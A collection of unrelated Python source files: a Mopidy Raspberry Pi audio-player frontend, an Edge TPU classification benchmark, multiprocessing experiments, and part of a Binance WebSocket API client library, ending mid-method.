"UNEXPECTED SUCCESS: LLDB (suite) :: %s (%s)" %
(u, system_info))
sys.exit(exit_code)
if __name__ == '__main__':
sys.stderr.write(
"error: dosep.py no longer supports being called directly. "
"Please call dotest.py directly. The dosep.py-specific arguments "
"have been added under the Parallel processing arguments.\n")
sys.exit(128)
|
frontend.py
|
import logging
import traceback
import pykka
import time
import threading
from mopidy import core
from .gpio_manager import GPIOManager
from humanfriendly import format_timespan
from RPi import GPIO
from time import sleep
from mpd import MPDClient
logger = logging.getLogger(__name__)
class GpioFrontend(pykka.ThreadingActor, core.CoreListener):
def __init__(self, config, core):
super(GpioFrontend, self).__init__()
self.core = core
self.sleep_time = False
self.config = config['hoerbert']
self.gpio_manager = GPIOManager(self, config['hoerbert'])
self.playlists = {}
self.currentPlaylist = -1
self.update_playlists_registry()
self.core.playback.volume = 10
self.volume = 10
# self.gpio_manager.register_rotary_encode(
# 'volume',
# self.config["pin_button_volume_up"],
# self.config["pin_button_volume_down"],
# self.config["volume_steps"]
# )
self.gpio_manager.register_button(self.config["pin_button_play"], 'play', longpress=False)
self.gpio_manager.register_button(self.config["pin_button_sleep"], 'sleep', longpress=False)
for i in range(1, 10):
self.gpio_manager.register_button(
self.config['pin_button_playlist_' + str(i)], "playlist_" + str(i))
self.handle_sleep_timer()
self.volume_handle_thread = StoppableThread(target=self.handle_volume)
self.volume_handle_thread.start()
self.update_volume()
def handle_sleep_timer(self):
self.update_playlists_registry()
if self.sleep_time != False:
if self.sleep_time > time.time():
logger.info(format_timespan(self.sleep_time - time.time()) + ' until sleep')
else:
logger.info('going to sleep')
self.sleep_time = False
self.core.playback.pause()
self.sleep_handle_thread = threading.Timer(15, self.handle_sleep_timer)
self.sleep_handle_thread.start()
def update_volume(self):
if self.core.playback.volume.get() != self.volume:
logger.info('updating volume: ' + str(self.volume))
self.core.playback.volume = self.volume
self.update_volume_thread = threading.Timer(0.1, self.update_volume)
self.update_volume_thread.start()
def handle_volume(self):
clk = 4
dt = 17
GPIO.setmode(GPIO.BCM)
GPIO.setup(clk, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(dt, GPIO.IN, pull_up_down=GPIO.PUD_UP)
longWaitCounter = 0
longWaitThreshold = 3
longWaitTime = 0.01
shortWaitTime = 0.0001
volumeSteps = 2
clkLastState = GPIO.input(clk)
try:
while not self.volume_handle_thread.stopped():
clkState = GPIO.input(clk)
dtState = GPIO.input(dt)
if clkState != clkLastState:
volume = self.volume
if dtState != clkState:
volume += volumeSteps
else:
volume -= volumeSteps
if volume > 100:
volume = 100
if volume < 0:
volume = 0
self.volume = volume
longWaitCounter = 0
#logger.info('internal volume: ' + str(self.volume))
clkLastState = clkState
longWaitCounter += 1
if longWaitCounter > (longWaitThreshold / shortWaitTime):
sleep(longWaitTime)
else:
sleep(shortWaitTime)
finally:
GPIO.cleanup()
def update_playlists_registry(self):
for playlist in self.core.playlists.playlists.get():
for i in range(1, 10):
playlist_identifier = 'playlist_' + str(i)
if self.config[playlist_identifier] in playlist.name:
if playlist_identifier not in self.playlists:
logger.info('Playlist found for ' + str(i) + ' Button: ' + playlist.name)
self.playlists[playlist_identifier] = playlist
def on_failure(exception_type, exception_value, traceback):
self.sleep_handle_thread.cancel()
self.update_volume_thread.cancel()
def on_stop(self):
self.sleep_handle_thread.cancel()
self.volume_handle_thread.stop()
self.update_volume_thread.cancel()
def playback_state_changed(self, old_state, new_state):
return
if new_state == core.PlaybackState.PLAYING:
self.gpio_manager.set_led(True)
else:
self.gpio_manager.set_led(False)
def input(self, input_event):
logger.info(input_event['key'])
try:
if input_event['key'] == 'volume':
current = self.core.playback.volume.get()
current += input_event["value"]
if current > 100:
current = 100
if current < 0:
current = 0
logger.info('Volume: ' + str(current))
self.core.playback.volume = current
elif input_event['key'] == 'sleep':
logger.info('starting sleep timer')
self.sleep_time = time.time() + (self.config['sleep_time'] * 60)
if self.core.playback.state.get() == core.PlaybackState.PAUSED:
logger.info('resuming playback')
self.core.playback.play()
elif input_event['key'] == 'play':
if self.core.playback.state.get() == core.PlaybackState.PLAYING:
logger.info('pausing playback')
self.core.playback.pause()
else:
logger.info('resuming playback')
self.core.playback.play()
elif self.playlists[input_event['key']]:
playlist = self.playlists[input_event['key']]
if self.currentPlaylist == input_event['key']:
current_track = self.core.playback.get_current_track().get()
if input_event['long']:
for position in self.core.tracklist.get_tl_tracks().get():
if current_track.album.name != position.track.album.name:
logger.info('Skipping to next Album in Playlist "' + position.track.name)
self.core.playback.play(tlid=position.tlid)
return
self.core.playback.play(tlid=1)
else:
logger.info('Skipping to next Track in Album "' + current_track.album.name)
self.core.playback.next()
else:
logger.info('Switching to Playlist "' + playlist.name)
self.currentPlaylist = input_event['key']
self.core.tracklist.clear()
self.core.tracklist.add(playlist.tracks)
self.core.playback.play()
except Exception:
traceback.print_exc()
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stop = threading.Event()
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.isSet()
|
classify_tpu_standlone.py
|
# Copyright (c) HP-NTU Digital Manufacturing Corporate Lab, Nanyang Technological University, Singapore.
#
# This source code is licensed under the Apache-2.0 license found in the
# LICENSE file in the root directory of this source tree.
import argparse
from edgetpu.classification.engine import ClassificationEngine
from PIL import Image
import os
import time
from collections import OrderedDict
import numpy as np
import accuracy
import json
import sys
import logging
from power import serialUtil
from multiprocessing import Process
import threading
logger = logging.getLogger()
DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
logging.basicConfig(filename="latency_summary.txt", filemode="a", format="%(asctime)s--%(levelname)s--%(message)s", datefmt=DATE_FORMAT)
logger.setLevel(logging.INFO)
alive = True
def cifarnet_preprocessing():
return
def lenet_preprocessing():
return
def get_preprocessing(name):
preprocessing_fn_map = {
'cifarnet': cifarnet_preprocessing,
'inception': inception_preprocessing,
'inception_v1': inception_preprocessing,
'inception_v2': inception_preprocessing,
'inception_v3': inception_preprocessing,
'inception_v4': inception_preprocessing,
'inception_resnet_v2': inception_preprocessing,
'lenet': lenet_preprocessing,
'mobilenet_v1': inception_preprocessing,
'mobilenet_v2': inception_preprocessing,
'mobilenet_v2_035': inception_preprocessing,
'mobilenet_v3_small': inception_preprocessing,
'mobilenet_v3_large': inception_preprocessing,
'mobilenet_v3_small_minimalistic': inception_preprocessing,
'mobilenet_v3_large_minimalistic': inception_preprocessing,
'mobilenet_edgetpu': inception_preprocessing,
'mobilenet_edgetpu_075': inception_preprocessing,
'mobilenet_v2_140': inception_preprocessing,
'nasnet_mobile': inception_preprocessing,
'nasnet_large': inception_preprocessing,
'pnasnet_mobile': inception_preprocessing,
'pnasnet_large': inception_preprocessing,
'resnet_v1_50': vgg_preprocessing,
'resnet_v1_101': vgg_preprocessing,
'resnet_v1_152': vgg_preprocessing,
'resnet_v1_200': vgg_preprocessing,
'resnet_v2_50': vgg_preprocessing,
'resnet_v2_101': vgg_preprocessing,
'resnet_v2_152': vgg_preprocessing,
'resnet_v2_200': vgg_preprocessing,
'vgg': vgg_preprocessing,
'vgg_a': vgg_preprocessing,
'vgg_16': vgg_preprocessing,
'vgg_19': vgg_preprocessing,
'mnasnet_b1': inception_preprocessing
}
return preprocessing_fn_map[name]
def central_crop(image: Image, central_fraction: float):
# image is PIL Image Format
img_h = image.size[1]
img_w = image.size[0]
bbox_h_start = int((1.0 * img_h - img_h * central_fraction) / 2)
bbox_w_start = int((1.0 * img_w - img_w * central_fraction) / 2)
bbox_h_size = img_h - bbox_h_start * 2
bbox_w_size = img_w - bbox_w_start * 2
bbox = (bbox_w_start, bbox_h_start, bbox_w_start + bbox_w_size, bbox_h_start + bbox_h_size)
return image.crop(bbox)
def inception_preprocessing(image: Image, height: int, width: int, central_fraction=0.875):
image = central_crop(image, central_fraction)
if height and width:
image = image.resize((width, height), Image.BILINEAR)
return image
def vgg_preprocessing(image: Image, height: int, width: int, resize_side=256):
img_h = image.size[1]
img_w = image.size[0]
if img_h > img_w:
scale = 1.0 * resize_side / img_w
else:
scale = 1.0 * resize_side / img_h
new_height = int(img_h * scale)
new_width = int(img_w * scale)
image = image.resize((new_width, new_height), Image.BILINEAR)
offset_height = (new_height - height) / 2
offset_width = (new_width - width) / 2
image = image.crop((offset_width, offset_height, offset_width + width, offset_height + height))
return image
def power():
# Initialize the serial port
su = serialUtil.SerialBlueTooth("/dev/rfcomm0")
su.connect()
# Read the data
with open("power_results.txt", 'w') as wf:
while alive:
wf.write(str(su.read())+'\n')
def main():
global alive
parser = argparse.ArgumentParser()
parser.add_argument('--data', help='Dataset Path', type=str, required=True)
parser.add_argument('--model', help='File path of Tflite model.', type=str, required=True)
parser.add_argument('--number', help='Running number to test.', type=int, required=True)
parser.add_argument('--label', type=str, help="real label path", required=True)
parser.add_argument('--modelname', type=str, help="model name", required=True)
args = parser.parse_args()
# Initialize engine
lm_start = time.time()
engine = ClassificationEngine(args.model)
lm_end = time.time()
input_shape = engine.get_input_tensor_shape()
image_files = {}
i = 0
# Force the order of images read as the number order in original dataset (ImageNet)
for filett in os.listdir(args.data):
image_files[i] = filett
i += 1
print("Total {0} images are tested".format(len(image_files)))
ori_total_infer = 0
total_save_time = 0
logger.info("Running " + args.model + " for " + str(args.number) + " begins")
p = threading.Thread(target=power)
p.start()
total_start = time.time()
# Run inference.
with open("temp_result", 'w') as wf:
with open("temp_result_5", 'w') as wf1:
for i in range(args.number):
for key in image_files:
image_t = Image.open(args.data + '/' + image_files[key])
if image_t.mode == 'L':
image_t = image_t.convert("RGB")
# To resize the image
preprocess_t = get_preprocessing(args.modelname)
image_t = preprocess_t(image_t, input_shape[1], input_shape[2])
# Execute the engine
results = engine.classify_with_image(image_t, top_k=1, threshold=1e-10)
# Get the inference time
origin_inf = engine.get_inference_time()
# logger.info("Iteration " + str(i) + " runs " + str(origin_inf) + " ms")
ori_total_infer = ori_total_infer + origin_inf
save_begin = time.time()
for result in results:
wf.write(image_files[key] + ' ' + str(result[0]) + '\n')
results = engine.classify_with_image(image_t, top_k=5, threshold=1e-10)
for result in results:
wf1.write(image_files[key] + ' ' + str(result[0]) + '\n')
save_end = time.time()
total_save_time = total_save_time + save_end - save_begin
end_time = time.time()
alive = False
p.join()
print("Total time taken {0} seconds".format(end_time - total_start))
print("Loading model time taken {0} seconds".format(lm_end - lm_start))
print("Total inference time {0} seconds".format(ori_total_infer/1000))
logger.info("Per image inference runs {0} ms".format(ori_total_infer/args.number))
logger.info("Running " + args.model + " finishes")
with open("power_results.txt", 'r') as rf:
line = rf.readline()
count = 0
temp = 0.0
while line:
line = line.strip()
if line == "None":
line = rf.readline()
continue
else:
count += 1
temp += float(line)
line = rf.readline()
print("Average power is {}".format(temp / count))
# print("Average power is 1.0")
# print("Total save time {0} seconds".format(total_save_time))
print("Top-1 accuracy:", end='')
accuracy.accuracy(args.label, "temp_result", len(image_files))
print("Top-5 accuracy:", end='')
accuracy.accuracy(args.label, "temp_result_5", len(image_files))
if __name__ == '__main__':
main()
|
mp_experiments.py
|
import ctypes, multiprocessing, multiprocessing.sharedctypes, time
from multiprocessing.managers import BaseManager
class MathsClass:
def __init__(self, i):
self.i = i
def add(self, x, y):
return x + y + self.i
def mul(self, x, y):
return x * y + self.i
def set_i(self, i):
self.i = i
def get_i(self):
return self.i
def __call__(self, x):
return self.i + x
class MyManager(BaseManager):
pass
MyManager.register('Maths', MathsClass)
def target(maths):
print('target', maths.get_i())
maths.set_i(5)
time.sleep(0.5)
print('target', maths.get_i())
maths.set_i(23)
time.sleep(1)
print('target', maths.get_i())
def do_it():
with MyManager() as manager:
ctx = multiprocessing.get_context('spawn')
maths = manager.Maths(1)
process = ctx.Process(target=target, args=(maths,)).start()
time.sleep(0.1)
print('source', maths.get_i())
maths.set_i(2)
time.sleep(1)
print('source', maths.get_i())
maths.set_i(17)
time.sleep(1)
def target2(array):
print('target address', ctypes.addressof(array))
print('target', array[0])
array[0] = 5
time.sleep(0.5)
print('target', array[0])
array[0] = 23
time.sleep(1)
print('target', array[0])
def do_it2():
ctx = multiprocessing.get_context('spawn')
array = multiprocessing.sharedctypes.RawArray(ctypes.c_uint8, 3 * 10240)
print('source address', ctypes.addressof(array))
process = ctx.Process(target=target2, args=(array,)).start()
time.sleep(0.1)
print('source', array[0])
array[0] = 2
time.sleep(1)
print('source', array[0])
array[0] = 17
time.sleep(1)
if __name__ == '__main__':
do_it2()
|
unicorn_binance_websocket_api_manager.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: unicorn_binance_websocket_api/unicorn_binance_websocket_api_manager.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from .unicorn_binance_websocket_api_exceptions import StreamRecoveryError, UnknownExchange
from .unicorn_binance_websocket_api_socket import BinanceWebSocketApiSocket
from .unicorn_binance_websocket_api_restclient import BinanceWebSocketApiRestclient
from .unicorn_binance_websocket_api_restserver import BinanceWebSocketApiRestServer
from cheroot import wsgi
from collections import deque
from datetime import datetime
from flask import Flask, redirect
from flask_restful import Api
import asyncio
import colorama
import copy
import logging
import os
import platform
import psutil
import re
import requests
import sys
import threading
import time
import uuid
import ujson as json
import websockets
class BinanceWebSocketApiManager(threading.Thread):
"""
An unofficial Python API to use the Binance Websocket API`s (com+testnet, com-margin+testnet,
com-isolated_margin+testnet, com-futures+testnet, us, jex, dex/chain+testnet) in a easy, fast, flexible,
robust and fully-featured way.
This library supports two different kind of websocket endpoints:
- CEX (Centralized exchange): binance.com, binance.vision, binance.je, binance.us, trbinance.com, jex.com
- DEX (Decentralized exchange): binance.org
Binance.com websocket API documentation:
- https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md
- https://binance-docs.github.io/apidocs/futures/en/#user-data-streams
- https://binance-docs.github.io/apidocs/spot/en/#user-data-streams
Binance.vision (Testnet) websocket API documentation:
- https://testnet.binance.vision/
Binance.us websocket API documentation:
- https://github.com/binance-us/binance-official-api-docs/blob/master/web-socket-streams.md
- https://github.com/binance-us/binance-official-api-docs/blob/master/user-data-stream.md
TRBinance.com websocket API documentation:
- https://www.trbinance.com/apidocs/#general-wss-information
Jex.com websocket API documentation:
- https://jexapi.github.io/api-doc/option.html#web-socket-streams
- https://jexapi.github.io/api-doc/option.html#user-data-streams
Binance.org websocket API documentation:
- https://docs.binance.org/api-reference/dex-api/ws-connection.html
:param process_stream_data: Provide a function/method to process the received webstream data. The function
will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data, stream_buffer_name)` where
`stream_data` cointains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer! `How to read from stream_buffer!
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
:param exchange: Select binance.com, binance.com-testnet, binance.com-margin, binance.com-margin-testnet,
binance.com-isolated_margin, binance.com-isolated_margin-testnet, binance.com-futures,
binance.com-futures-testnet, binance.com-coin_futures, binance.us, trbinance.com,
jex.com, binance.org or binance.org-testnet (default: binance.com)
:type exchange: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:param throw_exception_if_unrepairable: set to `True` to activate exceptions if a crashed stream is unrepairable
(invalid API key, exceeded subscription limit) or an unknown exchange is
used
:type throw_exception_if_unrepairable: bool
:param restart_timeout: A stream restart must be successful within this time, otherwise a new restart will be
initialized. Default is 6 seconds.
:type restart_timeout: int
:param show_secrets_in_logs: set to True to show secrets like listen_key, api_key or api_secret in log file
(default=False)
:type show_secrets_in_logs: bool
:param output_default: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise
with the default setting "raw_data" the output remains unchanged and gets delivered as
received from the endpoints. Change this for a specific stream with the `output` parameter
of `create_stream()` and `replace_stream()`
:type output_default: str
:param enable_stream_signal_buffer: set to True to enable the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and receive information about
disconnects and reconnects to manage a restore of the lost data during the
interruption or to recognize your bot got blind.
:type enable_stream_signal_buffer: bool
:param disable_colorama: set to True to disable the use of `colorama <https://pypi.org/project/colorama/>`_
:type disable_colorama: bool
:param stream_buffer_maxlen: Set a max len for the generic `stream_buffer`. This parameter can also be used within
`create_stream()` for a specific `stream_buffer`.
:type stream_buffer_maxlen: int or None
:param process_stream_signals: Provide a function/method to process the received stream signals. The function
will be called instead of
`add_to_stream_signal_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.add_to_stream_signal_buffer>`_
like `process_stream_data(signal_type=False, stream_id=False, data_record=False)`.
:type process_stream_signals: function
"""
def __init__(self,
process_stream_data=False,
exchange="binance.com",
warn_on_update=True,
throw_exception_if_unrepairable=False,
restart_timeout=6,
show_secrets_in_logs=False,
output_default="raw_data",
enable_stream_signal_buffer=False,
disable_colorama=False,
stream_buffer_maxlen=None,
process_stream_signals=False):
threading.Thread.__init__(self)
self.name = "unicorn-binance-websocket-api"
self.version = "1.34.2.dev"
logging.info(f"New instance of {self.get_user_agent()} on "
f"{str(platform.system())} {str(platform.release())} for exchange {exchange} started ...")
if disable_colorama is not True:
logging.info(f"Initiating `colorama_{colorama.__version__}`")
colorama.init()
logging.info(f"Using `websockets_{websockets.__version__}`")
if process_stream_data is False:
# no special method to process stream data provided, so we use add_to_stream_buffer:
self.process_stream_data = self.add_to_stream_buffer
logging.info(f"Using `stream_buffer`")
else:
# use the provided method to process stream data:
self.process_stream_data = process_stream_data
logging.info(f"Using `process_stream_data`")
if process_stream_signals is False:
# no special method to process stream signals provided, so we use add_to_stream_signal_buffer:
self.process_stream_signals = self.add_to_stream_signal_buffer
logging.info(f"Using `stream_signal_buffer`")
else:
# use the provided method to process stream signals:
self.process_stream_signals = process_stream_signals
logging.info(f"Using `process_stream_signals` ...")
self.exchange = exchange
if self.exchange == "binance.com":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-futures":
self.websocket_base_uri = "wss://fstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-coin-futures" or self.exchange == "binance.com-coin_futures":
self.websocket_base_uri = "wss://dstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-futures-testnet":
self.websocket_base_uri = "wss://stream.binancefuture.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.us":
self.websocket_base_uri = "wss://stream.binance.us:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "trbinance.com":
self.websocket_base_uri = "wss://stream.binance.cc/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "jex.com":
self.websocket_base_uri = "wss://ws.jex.com/"
self.max_subscriptions_per_stream = 10
elif self.exchange == "binance.org":
self.websocket_base_uri = "wss://dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.org-testnet":
self.websocket_base_uri = "wss://testnet-dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
else:
# Unknown Exchange
error_msg = f"Unknown exchange '{str(self.exchange)}'! Read the docs to see a list of supported " \
"exchanges: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_" \
"binance_websocket_api.html#module-unicorn_binance_websocket_api.unicorn_binance_websocket_" \
"api_manager"
logging.critical(error_msg)
raise UnknownExchange(error_msg)
self.stop_manager_request = None
self.all_subscriptions_number = 0
self.binance_api_status = {'weight': None,
'timestamp': 0,
'status_code': None}
self.dex_user_address = False
self.enable_stream_signal_buffer = enable_stream_signal_buffer
self.event_loops = {}
self.frequent_checks_list = {}
self.frequent_checks_list_lock = threading.Lock()
self.receiving_speed_average = 0
self.receiving_speed_peak = {'value': 0,
'timestamp': time.time()}
self.keep_max_received_last_second_entries = 5
self.keepalive_streams_list = {}
self.last_entry_added_to_stream_buffer = 0
self.last_monitoring_check = time.time()
self.last_update_check_github = {'timestamp': time.time(),
'status': None}
self.last_update_check_github_check_command = {'timestamp': time.time(),
'status': None}
self.max_send_messages_per_second = 5
self.max_send_messages_per_second_reserve = 2
self.most_receives_per_second = 0
self.monitoring_api_server = False
self.monitoring_total_received_bytes = 0
self.monitoring_total_receives = 0
self.output_default = output_default
self.reconnects = 0
self.reconnects_lock = threading.Lock()
self.request_id = 0
self.request_id_lock = threading.Lock()
self.restart_requests = {}
self.restart_timeout = restart_timeout
self.ringbuffer_error = []
self.ringbuffer_error_max_size = 500
self.ringbuffer_result = []
self.ringbuffer_result_max_size = 500
self.show_secrets_in_logs = show_secrets_in_logs
self.start_time = time.time()
self.stream_buffer_maxlen = stream_buffer_maxlen
self.stream_buffer = deque(maxlen=self.stream_buffer_maxlen)
self.stream_buffer_lock = threading.Lock()
self.stream_buffer_locks = {}
self.stream_buffers = {}
self.stream_list = {}
self.stream_list_lock = threading.Lock()
self.stream_signal_buffer = deque()
self.stream_signal_buffer_lock = threading.Lock()
self.stream_threading_lock = {}
self.throw_exception_if_unrepairable = throw_exception_if_unrepairable
self.total_received_bytes = 0
self.total_received_bytes_lock = threading.Lock()
self.total_receives = 0
self.total_receives_lock = threading.Lock()
self.total_transmitted = 0
self.total_transmitted_lock = threading.Lock()
self.websocket_list = {}
self.start()
self.replaced_secrets_text = "***SECRET_REMOVED***"
self.restclient = BinanceWebSocketApiRestclient(self)
if warn_on_update and self.is_update_availabe():
update_msg = f"Release {self.name}_" + self.get_latest_version() + " is available, " \
"please consider updating! (Changelog: https://github.com/oliver-zehentleitner/unicorn-" \
"binance-websocket-api/blob/master/CHANGELOG.md)"
print(update_msg)
logging.warning(update_msg)
def _add_stream_to_stream_list(self,
stream_id,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=False,
ping_timeout=False,
close_timeout=False,
stream_buffer_maxlen=None):
"""
Create a list entry for new streams
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label for the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globaly overwritten with the parameter
`output_default <https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
"""
if output is False:
output = self.output_default
self.stream_threading_lock[stream_id] = {'full_lock': threading.Lock(),
'receives_statistic_last_second_lock': threading.Lock()}
self.stream_list[stream_id] = {'exchange': self.exchange,
'stream_id': copy.deepcopy(stream_id),
'recent_socket_id': None,
'channels': copy.deepcopy(channels),
'markets': copy.deepcopy(markets),
'stream_label': copy.deepcopy(stream_label),
'stream_buffer_name': copy.deepcopy(stream_buffer_name),
'stream_buffer_maxlen': copy.deepcopy(stream_buffer_maxlen),
'symbols': copy.deepcopy(symbols),
'output': copy.deepcopy(output),
'subscriptions': 0,
'payload': [],
'api_key': copy.deepcopy(api_key),
'api_secret': copy.deepcopy(api_secret),
'dex_user_address': copy.deepcopy(self.dex_user_address),
'ping_interval': copy.deepcopy(ping_interval),
'ping_timeout': copy.deepcopy(ping_timeout),
'close_timeout': copy.deepcopy(close_timeout),
'status': 'starting',
'start_time': time.time(),
'processed_receives_total': 0,
'receives_statistic_last_second': {'most_receives_per_second': 0, 'entries': {}},
'seconds_to_last_heartbeat': None,
'last_heartbeat': None,
'kill_request': None,
'stop_request': None,
'crash_request': None,
'seconds_since_has_stopped': None,
'has_stopped': False,
'reconnects': 0,
'logged_reconnects': [],
'processed_transmitted_total': 0,
'last_static_ping_listen_key': 0,
'listen_key': False,
'listen_key_cache_time': 30 * 60,
'last_received_data_record': None,
'processed_receives_statistic': {},
'transfer_rate_per_second': {'bytes': {}, 'speed': 0}}
logging.info("BinanceWebSocketApiManager._add_stream_to_stream_list(" +
str(stream_id) + ", " + str(channels) + ", " + str(markets) + ", " + str(stream_label) + ", "
+ str(stream_buffer_name) + ", " + str(stream_buffer_maxlen) + ", " + str(symbols) + ")")
def _create_stream_thread(self,
loop,
stream_id,
channels,
markets,
stream_buffer_name=False,
stream_buffer_maxlen=None,
restart=False):
"""
Co function of self.create_stream to create a thread for the socket and to manage the coroutine
:param loop: provide a asynio loop
:type loop: asyncio loop
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: uuid
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:param restart: set to `True`, if its a restart!
:type restart: bool
:return:
"""
if self.is_stop_request(stream_id):
return False
if restart is False:
if stream_buffer_name is not False:
self.stream_buffer_locks[stream_buffer_name] = threading.Lock()
try:
# Not resetting the stream_buffer during a restart:
if self.stream_buffers[stream_buffer_name]:
pass
except KeyError:
